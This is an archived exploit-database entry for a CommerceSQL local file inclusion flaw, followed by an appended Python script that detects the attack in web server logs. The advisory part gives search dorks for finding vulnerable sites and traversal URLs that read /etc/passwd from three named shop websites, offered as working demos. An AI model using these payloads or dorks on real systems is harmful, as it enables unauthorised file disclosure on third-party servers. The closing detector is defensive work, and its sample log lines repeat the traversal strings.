CommerceSQL LFI Vulnerability

2011-05-08T00:00:00
ID 1337DAY-ID-16070
Type zdt
Reporter xConsoLe`
Modified 2011-05-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
# Exploit Title: CommerceSQL LFI Vulnerability
# Author: xConsoLe`
# Home: http://dztools.net
# Vendor or Software Link: http://www.commercesql.com/
# Category: Local File Include
# d0rk: intext:Couldn't exec sth! at ./admin/html_lib.pl line
# d0rk: inurl:cgi-bin/commercesql
# Tested on: Windows XP SP3

   
   
   > Demo:
   
   eg: http://birdstheword.com/cgi-bin/eStore/index.cgi?cart_id=2263.81894&pid=396
   
   >> http://birdstheword.com/cgi-bin/eStore/index.cgi?page=../../../../../../../etc/passwd
   
   
   eg: http://www.garagedoorcheck.com/cgi-bin/CommerceSQL/index.cgi?page=95
   
   >> http://www.garagedoorcheck.com/cgi-bin/CommerceSQL/index.cgi?page=../../../../../../../etc/passwd
   
   
   eg: http://brewercoinc.com/cgi-bin/eStore/index.cgi?did=2&plid=&pid=27&product=
   
   >> http://brewercoinc.com/cgi-bin/eStore/index.cgi?page=../../../../../../../etc/passwd
   

   
   Greetz: My Girl <3 ; Uknownv1rus ; Dfpirate ; J|nX ; Massyusse ; Death.Sev ; XeN` ; FiiskeR ; Manson .
   Made in Algeria .
   Shab El Bac 2011 nchallah : Ma , Am , Li , Sa , Sa , Ha , Mehdi K , Rafa , Bou3am , 
                               MahM0ud , Death.Sev & All Djma3et Elkhire :D .
							   
				PEACE ^^ .
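
A detection check for the `page` parameter traversal shown in the demo requests above, added here as an example and not part of the original advisory: it scans web server access logs in Combined Log Format for `page` values that leave the template directory. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# client ident user [time] "METHOD target PROTO" status ...
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is seen in plain form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if a `page` value walks out of the template directory."""
    # Backslashes are normalised because the advisory was tested on Windows.
    plain = fully_decode(value).replace("\\", "/")
    return ".." in plain.split("/") or plain.startswith("/") or "\x00" in plain

def find_traversal(log_lines, param="page"):
    """Return (client, status, decoded value) for each suspicious request."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        # parse_qsl already decodes once; fully_decode handles extra layers.
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if key == param and is_traversal(value):
                hits.append((client, int(status), fully_decode(value)))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/May/2011:10:00:01 +0000] "GET /cgi-bin/CommerceSQL/index.cgi?page=95 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/May/2011:10:00:05 +0000] "GET /cgi-bin/CommerceSQL/index.cgi?page=../../../../../../../etc/passwd HTTP/1.1" 200 1873',
    '198.51.100.7 - - [08/May/2011:10:00:09 +0000] "GET /cgi-bin/eStore/index.cgi?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 500 312',
    '192.0.2.10 - - [08/May/2011:10:00:12 +0000] "GET /cgi-bin/eStore/index.cgi?did=2&pid=27 HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit)
```

A hit answered with status 200 deserves priority in triage, since the requested file may have been returned to the client.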


